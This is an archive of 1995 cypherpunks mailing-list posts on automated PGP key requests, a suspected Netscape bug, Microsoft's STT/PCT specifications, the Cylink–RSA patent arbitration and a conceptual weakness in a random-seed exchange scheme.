I think a remailer client is within > Java's capabilities... Anyone disagree? Depends on how Netscape implements Java. Under HotJava it could conceivably be done, although Security setting may restrict the browser from doing SMTP... Actually, I would suspect it might be possible to do using forms, using a mailto: form. Hmmmmmmmm....... Bob From tjic at OpenMarket.com Wed Sep 27 09:29:01 1995 From: tjic at OpenMarket.com (Travis Corcoran) Date: Wed, 27 Sep 95 09:29:01 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: <199509271628.MAA12868@cranmore.openmarket.com> -----BEGIN PGP SIGNED MESSAGE----- Message-Signature-Date: Wed Sep 27 12:28:47 1995 > Date: Tue, 19 Sep 1995 10:57:32 -0700 > To: cypherpunks at toad.com > From: tcmay at got.net (Timothy C. May) > Subject: Mini-mailbombs and Warning Letters > > I've received a couple of "automatically generated" pieces of > e-mail which tell me that, in the generator's opinion, something is > wrong with my public key, or it could not be found at the keyserver > > As the saying goes, "Sigh." > > Being on a list with 700 subscribers, some of whom are running > increasingly sophisticated automatic checking agents, I foresee an > increase in these "warning letters" from their checking agents who > feel posts are not adequate in some way. As the author of the package in question, I would like to point out: (1) the email msg Tim refers to (hereafter referred to by me as "query-mail") was a request for information, not a warning (2) the query-mail did not refer to any inadequacy in the original posting. It explicitly refers to the fact that the original poster PGP signed a message, but did not make the public key to verify the message easily available. (3) the query-mail was sent to an actual person only after several non-intrusive methods had failed. (4) checking right now, I find that the finger command does indeed fail to get a public key from Tim's address.
(5) checking right now, I find that BAL's keyserver does indeed fail to give any key with the address "tcmay at got.net" (6) the query-mail is not a purely robotic spam: there is a human in the loop (7) the keyserver used by query-mail generator defaults, not to some arbitrary preference, but to BAL's keyserver, which is the most used server that I know of, and which (to the best of my knowledge) receives regular updates from several other keyservers. (8) given that "increasingly sophisticated automatic checking agents" can make it much easier for individuals to gather keys, check incoming messages, and sign or encrypt outgoing messages, it seems that such "agents" tend to increase the usage and acceptance of cryptography, which is a good thing for all concerned. A question: in a situation like this one, where an individual signed a message with a key then did not make a key with the return address of his message available either through his .plan, or a keyserver (the two de facto standards), what next step -if any- do people think is more appropriate than sending mail to the individual asking them for a copy of the key ? > I'm dealing with it the same way I'm dealing with the few people > who have something in their MIME setup that triggers my mailer > (Eudora Pro 2.1) to treat their text as attachments. Namely, by > filtering them out. This is a fine anarchistic solution to the problem (and that's a compliment!), from your point of view (although, I hasten to point out, not quite as good as submitting a key with a valid address on it to a keyserver). If anyone else wishes to ignore requests for keys, the subject string to add to your email kill-file is "please send me your PGP public key" Because I do think that automating parts of the encryption/signing/verification/decryption/key-retrieval process will make cryptography more wide-spread (in so far as there is not a backlash against this automation), I do not want to ignore the concerns of others.
So...how would people do things differently if they were writing this sort of software? One idea proposed by Jiri Baum is to find the key ID used to sign the message, and then query the keyserver with this ID, as opposed to an email string. I'm not sure whether or not I like this idea (for security reasons), but that question is moot, as it seems to be impossible given the current keyservers. Any other suggestions or ideas? - -- TJIC (Travis J.I. Corcoran) http://www.openmarket.com/personal/tjic/ Member EFF, GOAL, NRA. opinions (TJIC) != opinions (employer (TJIC)) "Buy a rifle, encrypt your data, and wait for the Revolution!" PGP encrypted mail preferred. Ask me about mail-secure.el for emacs. -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAwUBMGl7wIJYfGX+MQb5AQErpQP/XvoJ0QF4TEtPhJuxk5ifsUlXrl4RSvyP dFh1MkTQWl4/D+jFHI0MW+gyi2/EmzxEW+8zYUCLENBIq8H3QJgQDnQ9NRM3JiGU c9yd4EeE9bH8r+KppF5WfJfuE4hJ6YFRO0sdal0oJs3RfuF2ZIHoLoKPR5G97EGv dmWg2J784ZM= =xnv7 -----END PGP SIGNATURE----- From frissell at panix.com Wed Sep 27 09:46:25 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 27 Sep 95 09:46:25 PDT Subject: It's Wednesday Message-ID: <199509271646.MAA06516@panix.com> Do you know where your new Netscape is? From samman-ben at CS.YALE.EDU Wed Sep 27 10:15:37 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Wed, 27 Sep 95 10:15:37 PDT Subject: PGP and FBI? In-Reply-To: <199509270409.AAA00688@libws4.ic.sunysb.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 27 Sep 1995, Deranged Mutant wrote: > > There's some sort of documentary on WBAI 99.5 FM out of NYC now. > They're talking about PGP and right wing militias... the guy being > interviewed called PGP a "one time pad system" and doesn't understand > it... *sigh* Well there really is no reason that you can't use PGP as a hash function or its random function to produce OTP's.
Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMGmGpL5ALmeTVXAJAQGJ0AL/dCS9dbl5NBHohG6VrUgU2CdBP99AsYvD 7TN0hV8pJrsgsy1OyuCHAlP5rFBlUHiTsWUJfYKAhaRSgF4MLMfEpgKbc58BNkhh vXq3qfeIt/cRgiMbpuWpbtO9GyPzRSgR =vB06 -----END PGP SIGNATURE----- From donlonm at ccmail.mcclellan.af.mil Wed Sep 27 10:23:54 1995 From: donlonm at ccmail.mcclellan.af.mil (donlonm at ccmail.mcclellan.af.mil) Date: Wed, 27 Sep 95 10:23:54 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil> Ray, You wrote: >I've found a Netscape bug which I suspect is a buffer overflow and >may have the potential for serious damage. If it is an overflow bug, >then it may be possible to infect every computer which accesses a web >page with Netscape. Is there any way to avoid/prevent this problem by changing options in NetScape? Thanks, Mike D. From habs at warwick.com Wed Sep 27 10:23:57 1995 From: habs at warwick.com (Harry S. Hawk) Date: Wed, 27 Sep 95 10:23:57 PDT Subject: Microsoft & new Internet Security specs Message-ID: <199509271723.NAA16512@cmyk.warwick.com> http://www.prnewswire.com/cnoc/story/569463/18018 > [Company News on Call] [Return to Company Listing] > [Return to Headlines] > > MICROSOFT PUBLISHES SPECIFICATIONS DESIGNED TO HELP > IMPROVE SECURITY ON THE INTERNET > > ATLANTA, Sept. 27 /PRNewswire/ -- Microsoft Corp. (Nasdaq: MSFT) > today announced the publication of two specifications that address key > Internet security issues. Software designed with these specifications > will enable developers to incorporate improved security technology into > their applications, giving businesses and consumers confidence that > their transactions and communications will be secure. > The two specifications -- Secure Transaction Technology (STT) and > Private Communication Technology (PCT) -- were published today on the > Internet. 
To help encourage widespread adoption of STT and PCT, > Microsoft is making the specifications available at no charge to all > software developers, businesses, card brands and financial institutions > that want to create STT-compliant and PCT-compliant applications. Both > can be found on the Microsoft home page (http//:www.microsoft.com). > "We set out a year ago to build STT, a security system that meets > the strict requirements of the payment-card industry. STT's design uses > sophisticated cryptographic techniques to help protect and authenticate > consumers, merchants and financial institutions that use bank cards to > conduct business on the Internet," said Craig Mundie, senior vice > president of the consumer systems division at Microsoft. "After doing > so, we felt we could also apply our expertise to the Internet's need for > general-purpose security. PCT builds upon Secure Sockets Layer by > incorporating strong authentication and other technologies we developed > for STT." > STT, jointly developed with Visa International, is supported by the > Internet Shopping Network, RSA Data Security Inc. and Spyglass Inc. The > PCT specification is supported by Cylink Corp., FTP Software Inc., > Internet Shopping Network, NetManage Inc., OpenMarket Inc., Spyglass > Inc. and Starwave Corp. > "We cannot afford to have doubt cast over the ability to conduct > business on the Internet," said Marc Miller, executive vice president of > marketing and business development for Spyglass Inc. "We applaud > Microsoft for approaching the security issue as it should be approached > -- in an open forum within the Internet community. Our whole business > model is based on partnerships. We're happy to be working with > Microsoft to provide an open, specifications-based solution to help > ensure the viability of this exciting new medium." 
> The Secure Transaction Technology specification, jointly developed > by Microsoft and Visa, is designed to provide a secure method for > handling credit-card transactions across private and public networks. > By providing a technology that can be completely integrated with the > current bank-card system, STT will serve as a reliable payment system > for software providers to incorporate into their products. STT also > preserves the branded transaction relationships that merchants and > financial institutions have with their customers. > The Private Communication Technology specification is designed to > secure general-purpose business and personal communications on the > Internet. PCT includes features such as privacy, authentication and > mutual identification. As a secure communications technology, PCT > builds on the earlier advances embodied in Secure Sockets Layer (SSL). > PCT enhances SSL by separating authentication from encryption. This > means that PCT allows applications to use authentication that is > significantly stronger than the 40-bit key limit for encryption allowed > by the U.S. government for export. > "The Internet Shopping Network is committed to providing the most > secure online shopping environment possible," said Boris Putanec, vice > president of engineering for the Internet Shopping Network. "STT > delivers one of the highest levels of security and authentication for > shopping transactions, boosting electronic commerce." > Microsoft plans to incorporate both STT and PCT into its own > products, such as the Microsoft(R) Internet Explorer 2.0, which ships > with the Window(R) operating system, and is encouraging other software > developers to do the same. > The specifications released by Microsoft include use of encryption > capabilities based on technology from RSA Data Security Inc. > Founded in 1975, Microsoft is the worldwide leader in software for > personal computers. 
The company offers a wide range of products and > services for business and personal use, each designed with the mission > of making it easier and more enjoyable for people to take advantage of > the full power of personal computing every day. > Microsoft is either a registered trademark or trademark in the > United States and/or other countries. From tcmay at got.net Wed Sep 27 10:27:39 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 27 Sep 95 10:27:39 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: At 4:28 PM 9/27/95, Travis Corcoran wrote: >As the author of the package in question, I would like to point out: > >(1) the email msg Tim refers to (hereafter refered to by me as "query-mail") > was a request for information, not a warning I've received several of these, not just the one Travis sent. I don't sign my messages, never have, so I see no way this "agent" Travis ran could find such a signed message from me. (It's conceivable he found an old--really old--message with a faked-up sig, as perhaps for a demonstration or spoof I was doing, but I'm skeptical. In any case, I suspect only an "automated searcher" could find the one or two messages that may look like this. If Travis produces the message here, I'm sure this will be what the situation is.) >(4) checking right now, I find that the finger command does indeed > fail to get a public key from Tim's address. > >(5) checking right now, I find that BAL's keyserver does indeed fail > to give any key with the address "tcmay at got.net" Like I said, I don't sign messages. My PGP 2.0 key was signed at the second CP meeting and, they tell me, submitted on the original MIT ring. "tcmay at netcom.com" was my e-mail address at that time.
>A question: in a situation like this one, where an individual signed a
>message with a key then did not make a key with the return address of
>his message available either through his .plan, or a keyserver (the two
>de facto standards), what next step -if any- do people think is more
>appropriate than sending mail to the individual asking them for a copy
>of the key ?

Ignore it. Why hassle people who have no plan or finger configurations? (I don't have a shell account.)

Besides, people who really want to communicate with me with PGP simply ask for it.

If you don't like this, fine. But don't robo-interrogate and send robo-warnings.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From daw at CS.Berkeley.EDU Wed Sep 27 10:48:23 1995
From: daw at CS.Berkeley.EDU (David_A Wagner)
Date: Wed, 27 Sep 95 10:48:23 PDT
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509270913.KAA17943@piraya.electrum.kth.se>
Message-ID: <199509271747.KAA01043@lagos.CS.Berkeley.EDU>

> | > Giving out contribution:
> | >     MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> | > Taking in contribution :
> | >     my_seed = my_seed XOR
> | >       ((select_low_bits(remote_contrib, contrib_width) << contrib_area))

So here's another attack on this scheme which I noticed today. I'll assume you're using the Netscape/RSAREF PRNG:

    prng() { increment(my_seed); return(MD5(my_seed)); }

Then an attacker can send you ``1'' as contribution. This will xor ``1 << contrib_area'' into your seed.
With probability 1/2, this will be the same as subtracting ``1 << contrib_area'' from your seed -- and in this case, your PRNG will repeat after ``1 << contrib_area'' more outputs. This is much worse than the expected 1 << 128 cycle length.

So this is an example of why it's dangerous to xor in values *chosen by your adversary* to your seed.

> Could you quantify how powerful a related-key attack is, compared to
> some other kind of attack? I don't know anything about this kind of
> attack, do you have any references?

I don't know about any work on related-key attacks on stream ciphers. For block ciphers, related-key attacks are much stronger than other attacks. (e.g. DES can be broken with ~ 2^28 related key queries and about ~ 2^28 off-line computation steps)

Here's some references on related key attacks on block ciphers. If anyone can find any other work in this area, let me know!

@inproceedings{subkeys-important,
  author    = {Edna K. Grossman and Bryant Tuckerman},
  title     = {Analysis of a Weakened {Feistel}-like Cipher},
  booktitle = {1978 International Conference on Communications},
  pages     = {46.3.1--46.3.5},
  publisher = {Alger Press Limited},
  year      = {1978},
  annote    = {Feistel ciphers with identical subkeys in each round are very weak}
}

@article{related-keys-1,
  author  = {Robert Winternitz and Martin Hellman},
  title   = {Chosen-key Attacks on a Block Cipher},
  journal = {Cryptologia},
  year    = {1987},
  volume  = {{XI}},
  number  = {1},
  month   = {January},
  pages   = {16--20}
}

@inproceedings{related-keys-2,
  author    = {Eli Biham},
  title     = {New Types of Cryptanalytic Attacks Using Related Keys},
  booktitle = {Advances in Cryptology: {EUROCRYPT} '93},
  pages     = {398--409},
  publisher = {Springer-Verlag},
  year      = {1994}
}

From tjic at OpenMarket.com Wed Sep 27 11:33:47 1995
From: tjic at OpenMarket.com (Travis Corcoran)
Date: Wed, 27 Sep 95 11:33:47 PDT
Subject: Timothy C.
 May: Mini-mailbombs and Warning Letters
In-Reply-To:
Message-ID: <199509271833.OAA13270@cranmore.openmarket.com>

-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Wed Sep 27 14:33:28 1995

> Date: Wed, 27 Sep 1995 10:39:21 -0700
> From: tcmay at got.net (Timothy C. May)
>
> At 4:28 PM 9/27/95, Travis Corcoran wrote:
>
> >As the author of the package in question, I would like to point out:
> >
> >(1) the email msg Tim refers to (hereafter referred to by me as "query-mail")
> > was a request for information, not a warning
>
> I don't sign my messages, never have, so I see no way this "agent" Travis
> ran could find such a signed message from me.

OK, then this sidetracks the discussion, as it seems we've got a bug in either software behavior (despite a fair amount of testing) or user behavior. If it's the former, I apologize for any hassle my software caused. I'll investigate this and issue a fix if it is a software problem.

However, I remind you that the query-mail said in it

- ------------------------------ snip! ------------------------------
If there is a bug w this sftwr (for example, you never PGP sign your msgs, so this entire msg makes no sense) [ ... ] please mail the author of this package ( tjic at openmarket.com )
- ------------------------------ snip! ------------------------------

For future reference, if anyone finds a bug in any of my software (free or otherwise), it is much more likely to get fixed by mailing me directly than by posting a manifesto about the class of software as a whole to a mailing list or newsgroup.

> >A question: in a situation like this one, where an individual
> >signed a message with a key then did not make a key with the
> >return address of his message available [ ... ] what next step -if
> >any- do people think is more appropriate than sending mail to the
> >individual asking them for a copy of the key ?
>
> Ignore it. Why hassle people who have no plan or finger
> configurations?
Well, during the year or so I've been using my package I've tried to verify thousands of posts. In hundreds of these times, I've not had the key on hand and had to use finger or the keyservers. In dozens of these times, finger and the keyserver failed, I sent mail to the original poster, and got a response back along the lines of:

"Unfortunately finger doesn't work at my site, but my key is on the keyserver...oh, wait...the address on the key is 6 months out of date! Sorry! Just updated it. { Try now. | My updated key is below }."

Thus, history has shown that it is often quite valid to ask people for their keys when all other avenues have been exhausted.

Further, I imagine that the vast majority of people who sign public UseNet messages intend for their messages to be verifiable, and thus find it reasonable to be asked for their keys if their keys are not easily available. If anyone thinks this is an incorrect assumption, I'd like to hear their thinking.

> Besides, people who really want to communicate with me with PGP
> simply ask for it.

Uh...isn't that the purpose that the query mail ("Please mail me your key. Thank you.") was serving? I'm not sure whether you're objecting to someone asking for your key, or the fact that they did it through a semi-automated process.

I posted an idea for a scheme recently that would convey the datum "I prefer PGP-encrypted mail" to intelligent cryptography-aware news/mail-readers. Perhaps the same scheme should be used to convey the datum "I do feel the need for my PGP-signed messages to be verified. Please do not ask me for my key." While it would be easy enough to implement, I'm not sure how many people would choose to encode this tag into their sig block or headers...

> If you don't like this, fine. But don't robo-interrogate and send
> robo-warnings.

I think the phrase "robo-interrogate" is pretty strong for sending a piece of email that has as its central message "Please mail me your key. Thank you."
The phrase "robo-warnings" is even less appropriate and relevant.

For the record, the full text of the query mail (including all three uses of the word "please", and all 0 references to "warnings", "interrogations", and "truncheons") is:

- ------------------------------ snip! ------------------------------
To: < mail-signer >
Subject: please send me your PGP public key

Hello. While reading either email or UseNet I came across a PGP signed msg from you, but did not have your public key to verify it with. My mail/newsreader fingered your account for your key and failed. It then tried to get your key from the keyserver at < keyserver-address > but the key was not there.

Please mail me your key. Thank you.

(If you think that the key should be there, be aware that my mailreader searched for the key by your email addr as seen by me - the same addr *this* piece of mail is being sent to. If you registered a key with the server, that key may not have on it your addr as it is seen by the rest of the world.)

P.S. This mail was composed by my mailreading sftwr, which automatically scans incoming mail, looking for failed keyserver requests, and prompts me whether it should automatically send this msg on my behalf. If there is a bug w this sftwr (for example, you never PGP sign your msgs, so this entire msg makes no sense), or if you're interested in the software itself (mail-secure.el: a package in lisp for emacs; this is just one of the many crypto/privacy related things it does) please mail the author of this package ( tjic at openmarket.com) for details.
- ------------------------------ snip! ------------------------------

If anyone has a constructive suggestion as to how this mail could be changed to convey more information or to be less "threatening", please mail me.

- --
TJIC (Travis J.I. Corcoran)   http://www.openmarket.com/personal/tjic/
Member EFF, GOAL, NRA.        opinions (TJIC) != opinions (employer (TJIC))
"Buy a rifle, encrypt your data, and wait for the Revolution!"
PGP encrypted mail preferred. Ask me about gnuslive.el for emacs.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

-----END PGP SIGNATURE-----

From sbryan at maroon.tc.umn.edu Wed Sep 27 12:13:05 1995
From: sbryan at maroon.tc.umn.edu (Steve Bryan)
Date: Wed, 27 Sep 95 12:13:05 PDT
Subject: macworld crypto articles
Message-ID:

>> In article <4444rl$nrh at life.ai.mit.edu> Chen writes:
>> > It's truly a deplorable state of affairs.
>>
>> For the next version, include PGP free with every version of Quicken,
>> and have Quicken just "call" PGP.
>>
>> Of course, users can encrypt their files now with PGP. Is there an
>> Intuit bboard where someone could post instructions?
>
>This is a good idea. I'll bring it up with the appropriate people.
>
>Right now, we only have some cheesy forums going on Compuserve and
>Prodigy; however, keep your eyes peeled. We have other stuff in the
>works.

PGP is probably too unwieldy for the non-hobbyist to comfortably use. I don't know if anyone else has suggested it but I'd strongly encourage Intuit to make CryptDisk for the Mac easily available. I use it to maintain an encrypted partition for my financial data and the user interface is quite simple. I believe the DOS equivalent is SecureDisk.
+----------------------------------------------------------------------
|Steve Bryan            Internet: sbryan at gofast.net
|Sexton Software        CompuServe: 76545,527
|Minneapolis, MN        Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------

From ic58 at jove.acs.unt.edu Wed Sep 27 12:13:07 1995
From: ic58 at jove.acs.unt.edu (Childers James)
Date: Wed, 27 Sep 95 12:13:07 PDT
Subject: (fwd) CYLINK Q&A on PKP Arbitration Decision
Message-ID: <199509271910.OAA23774@jove.acs.unt.edu>

Newsgroups: sci.crypt,talk.politics.crypto,alt.security.pgp
Path: news.unt.edu!cs.utexas.edu!howland.reston.ans.net!ix.netcom.com!netcom.com!jkennedy
From: jkennedy at netcom.com (John Kennedy)
Subject: CYLINK Q&A on PKP Arbitration Decision
Message-ID:
Keywords: Cylink, PKP, RSA, Public Key
Organization: CYLINK
Date: Wed, 27 Sep 1995 08:19:58 GMT
Lines: 277
Sender: jkennedy at netcom23.netcom.com
Xref: news.unt.edu sci.crypt:39749 talk.politics.crypto:12787 alt.security.pgp:43387

-----------------------------------------------------------------
CYLINK Q&A on PKP ARBITRATION

The following statement from Cylink Corporation has been posted to sci.crypt, talk.politics.crypto, and alt.security.pgp since we believe it will be of interest to a large and diverse set of readers. Please choose the appropriate newsgroup(s) to direct any follow-ups. A copy of this statement is also being placed on Cylink web page (http://www.cylink.com). Additional related materials and updates will also appear there. Feel free to distribute this statement to other appropriate newsgroups, mailing lists, and individuals.

-John C. Kennedy, Cylink Corporation {ph: 408.735.5885 , jkennedy at cylink.com}

---------------------- Cylink Corporation -------------------------

September 26, 1995

IMPACT OF CYLINK VS. RSA ARBITRATION AWARD
FREQUENTLY ASKED QUESTIONS

Q.
Why is the recent arbitration award between Cylink and RSA Data Security significant for RSA's licensees and vendors of public key cryptography in general?

A. The arbitration award is important to RSA's licensees for two reasons: First, the award makes it very clear that RSA does not have the right to authorize its customers to copy RSA's software; it doesn't matter whether the RSA customer is merely copying object code versions of RSA's products. The right to copy RSA software requires a patent license. Second, until now RSA has claimed itself to be the de facto standard in public key cryptography. This claim was possible only so long as RSA could prevent its competitors from getting patent licenses from Public Key Partners. Now that the arbitrators have dissolved PKP, Cylink can enable vendors to practice low cost public key technology without the use of RSA. The market will finally enjoy vigorous competition based on technology and price.

Q. In a recent statement, RSA's president still makes the claim that the use of RSA software does not require a separate patent license. Is that true?

A. That statement is not true for any RSA licensee who needs the right to copy RSA software. The heart of RSA's business is licensing so-called tool kits; the vendor takes one copy, incorporates it into the vendor's own product and then makes all of its own copies. The only RSA customers who don't need a patent license are those who don't copy RSA software.

Q. That could be pretty serious for RSA and its customers. Can you back up this statement?

A. Absolutely. Read the arbitrators' award at p. 14. If you haven't received a copy from RSA you can find it on Cylink's home page (http://www.cylink.com). Don't take our word for it. When RSA's own attorneys pleaded with the arbitrators to change their decision, they admitted that "...
every single RSA licensee will now be required to obtain a Stanford Patent License from Cylink or run the risk of being sued" (ask RSA for a copy of its attorneys' letter dated September 7). In a second decision dated September 12, the arbitrators flatly rejected RSA's pleas and confirmed their restrictions on the rights of RSA's customers. (A copy is also available from Cylink's home page.)

Q. RSA's president promises to indemnify all of its customers. Why should they be concerned?

A. If you compare RSA's size against the size and number of its customers copying RSA's software, one should ask whether RSA's pockets are deep enough to reimburse its customers for the damage RSA has caused.

Q. Did RSA know it did not have all of the rights it promised its customers in RSA's software licenses?

A. Shortly after RSA gave up its patent rights to PKP, Cylink began warning RSA that it did not have all of the rights it was promising some of its customers. Unfortunately, Cylink had to finally bring the arbitration to straighten this out.

Q. Why do RSA's customers need a license to the Stanford patents simply to copy RSA's software?

A. Two reasons. The Stanford Hellman-Merkle patent is the very first patent to describe Dr. Hellman's brilliant invention of public key cryptography. All subsequent refinements on this pioneer patent which implement Dr. Hellman's concept, such as the RSA algorithm, require a license to Dr. Hellman's patent. Secondly, the Diffie-Hellman key exchange technique is a standard feature in many of RSA's tool kits, which is also covered by Stanford's Diffie-Hellman patent. Finally, if RSA were correct in its statements that you don't need a Stanford license to use RSA's software, why would they embark on yet another expensive lawsuit to attack the patents?

Q. Isn't the Hellman-Merkle patent limited to practicing something called the knapsack?

A. No.
As the pioneer patent in public key, the inventors were required to disclose only one implementation to support their ground breaking invention. Even if no one is using the knapsack itself, this particular patent continues to cover all practice of public key. Only improvements, such as the RSA algorithm described in MIT's patent, are limited to the specific enablement described in the patent. Again, don't just take our word for it. RSA itself admits that RSA software is covered by these patents. Just look at their license for RSAREF, Paragraph 6 (before they have time to change it).

Q. But RSA has now brought suit to invalidate the Stanford Patents. Doesn't this protect RSA's customers?

A. RSA's attempt to invalidate the very patents it had been licensing as a partner in PKP does nothing for RSA's customers. First of all, the fact that someone else is challenging the validity of a patent doesn't make an infringer immune from suit. RSA's challenge to the Stanford patent would not prevent Cylink from suing and obtaining damages and an injunction against any infringer. (Indemnity for damages, by the way, is cold comfort if an RSA customer is enjoined from selling any public key software.) Second, anyone who waits around for RSA's case to be resolved is taking a big gamble. Patents are presumed valid and RSA will have to prove invalidity under the "clear and convincing" burden of proof (which is higher than the traditional "preponderance of the evidence" standard and just below the criminal "reasonable doubt" standard). If RSA loses the suit, all of its customers will be left hanging. An RSA indemnity won't be worth much if RSA goes into bankruptcy.

Q. RSA claims that Cylink "confirmed" to RSA licensees "in writing" "that no separate patent licenses were necessary if they licensed RSA software." Is this true?

A. No.
During the arbitration, however, one prospective RSA licensee approached Cylink and said that RSA kept assuring them that they didn't need a patent license to make their own copies of RSA public key software, but they had gotten suspicious when their own lawyers looked at the question closely. Cylink told the prospect that a patent license was needed for some of their projects, but in this instance Cylink would not interfere with the pending RSA deal. RSA customers who take the initiative and contact Cylink (as in this special case) can expect cooperation in resolving the patent problem.

Q. Why was PKP formed?

A. Cylink formed PKP with RSA to pool both parties' rights to the Stanford and MIT patents, promote public key technology, and generate licensing revenue for the partners, the universities which owned the patents, and the inventors.

Q. Why was PKP dissolved?

A. Obviously great animosity has grown between the parties. The main reason is that RSA frustrated Cylink's efforts to settle the U.S. Government's efforts to license the Digital Signature Standard. Now that Cylink has the Stanford patents back, the DSS as well as other public key techniques can begin competing with RSA in the market.

Q. How will these public key implementations compete with RSA? Isn't RSA a "de facto" standard?

A. If anything, RSA software (which includes Stanford algorithms such as Diffie-Hellman) has been prevalent by "default" - not by choice. Now the market will have a choice between multiple vendors competing on price as well as technical implementation. Only after RSA's software faces the test of competition can it fairly claim to be a standard.

Q. In his recent statement, RSA's president makes numerous accusations about Cylink's use of the RSA algorithm. What are the facts?

A. The arbitrators' award is very clear that Cylink in fact has certain rights to license the MIT patent.
Specifically, Cylink has an option to license the MIT patent provided it uses some software provided by RSA. This places Cylink in a better position than RSA's other customers who have no rights to the Stanford patents. It is important to remember that Cylink built its business for the last ten years on the use of Stanford public key technology - which proves our point that you don't need RSA or its software to practice public key.

Q. Doesn't Cylink use the RSA algorithm in one of its products?

A. Yes, and only one. What RSA fails to mention is that Cylink's largest customer, SWIFT, already holds its own PKP license which the arbitrators forced RSA to grant. This license allows Cylink to make the product for SWIFT.

Q. RSA claims that Cylink was offered a license to the RSA Patent, and that Cylink turned it down. Is that true?

A. Like a lot of what RSA says, it's a half-truth. In June, 1994, RSA did offer a patent license, and Cylink did turn it down. Why? Because a condition of the license was that Cylink release RSA from all liability for its licensing practices. In other words, the price for the license was more than just the royalty. Cylink was being asked to forgive RSA for the wrongs it committed over the years, and this Cylink would not do.

Q. Why did Cylink decide to use RSA in this one product?

A. During PKP's existence, RSA frequently sought Cylink's support for its technology by asking Cylink to use RSA. While RSA now tells a different story, RSA's own newsletter (see, for example, RSA's "Ciphertext" Fall 1993 issue) and corporate profile frequently promoted Cylink's use of RSA long before the parties fell into their dispute over licensing DSS. Having cooperated with RSA, and agreed to use their technology in one product, RSA tried to blackmail Cylink to stop PKP's settlement with the Government.
In any event, the restrictions imposed by the arbitrators on RSA's licensing business are far more severe than the minor inconvenience Cylink may experience in retro-fitting its product with Stanford technology.

Q. What will Cylink do with the Stanford patents now?

A. Before the arbitrators' decision many of RSA's customers had no reason to doubt RSA's word. Those RSA customers who now come forward will be offered very favorable agreements. Cylink is more interested in establishing commercial relationships with RSA's licensees and promoting public key technology than in disrupting existing business.

Q. Will Cylink attempt to stop the non-commercial use of public key (such as in PGP)?

A. No. Although, technically, a Stanford patent license is needed for public domain software such as PGP, Cylink intends to promote the use of public key on the Internet. Cylink intends to announce a royalty-free license for personal use after meeting with a spokesperson for the PGP community. Watch Cylink's home page for details (http://www.cylink.com).

Q. What advice can you give?

A. Get the facts first. Read the arbitrators' decision, including their September 12 ruling which denied RSA's request for modification. Then call us. (Call Bob Fougner at 408-735-5893, fax 408-735-6642, e-mail: fougner at cylink.com).

---------------------- Cylink Corporation -------------------------
John Kennedy
Cylink Corporation
408-735-5885
jkennedy at cylink.com

--
"Freedom is meaningless unless | ic58 at jove.acs.unt.edu - James Childers
you can give to those with whom| No man's freedom is safe
you disagree." - Jefferson     | while Congress is in session
EA 73 53 12 4E 08 27 6C 21 64 28 51 92 0E 7C F7

From bigmac at digicash.com Wed Sep 27 12:24:37 1995
From: bigmac at digicash.com (Marcel van der Peijl)
Date: Wed, 27 Sep 95 12:24:37 PDT
Subject: NO weak links ...
In-Reply-To:
Message-ID: <199509271924.UAA00338@digicash.com>

Mats Bergstrom wrote:

>Libel lawsuits for misunderstandings?
>
>Ridiculous.
>Libel threats are very rare on the CP list,
>it's one of the list's features. (I can't recollect any such
>threat since a well-known Nym was intimidated by LD, more
>than a year ago - and that Nym eventually saw the light.)

Oh come on. Don't take everything so seriously. This was not an explicit and/or real threat.

>Go sue yourself.

Suing myself is as unlikely as suing someone else. I am not American and do not know my lawyer on a first-name basis. You as fellow-European should understand this.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."

From shamrock at netcom.com Wed Sep 27 12:32:52 1995
From: shamrock at netcom.com (Lucky Green)
Date: Wed, 27 Sep 95 12:32:52 PDT
Subject: Fax encryption software
Message-ID: <199509271930.PAA28222@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article , grafolog at netcom.com (Jonathan Blake) wrote:

> I saw this article in alt.privacy.
>
> Anybody think the described encryption actually is worth
> looking at.

[...]

>We are talking about a 72 bit engine that is more than
>sufficiently strong for time sensitive general business purposes.

[...]

>>>It is fully licensed, without restriction for export, by the U.S.
>>>Department of Commerce. NO PGP WORRIES.

These two statements are mutually exclusive. Snakeoil.

- --
- -- Lucky Green
PGP encrypted mail preferred.

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

-----END PGP SIGNATURE-----

From bigmac at digicash.com Wed Sep 27 13:48:36 1995
From: bigmac at digicash.com (Marcel van der Peijl)
Date: Wed, 27 Sep 95 13:48:36 PDT
Subject: Sorry or something
Message-ID: <199509272048.VAA02445@digicash.com>

In case it was not clear: my earlier post really was not a lawsuit threat. It seems it was (mis)interpreted this way by some people.

Also, the original author did not post the article but someone he sent it to. I'm sure the author did not intend to post the text as is but first give us a fair chance of defending ourselves.

#include "My opinions and reactions do NOT represent the official DigiCash standpoint."

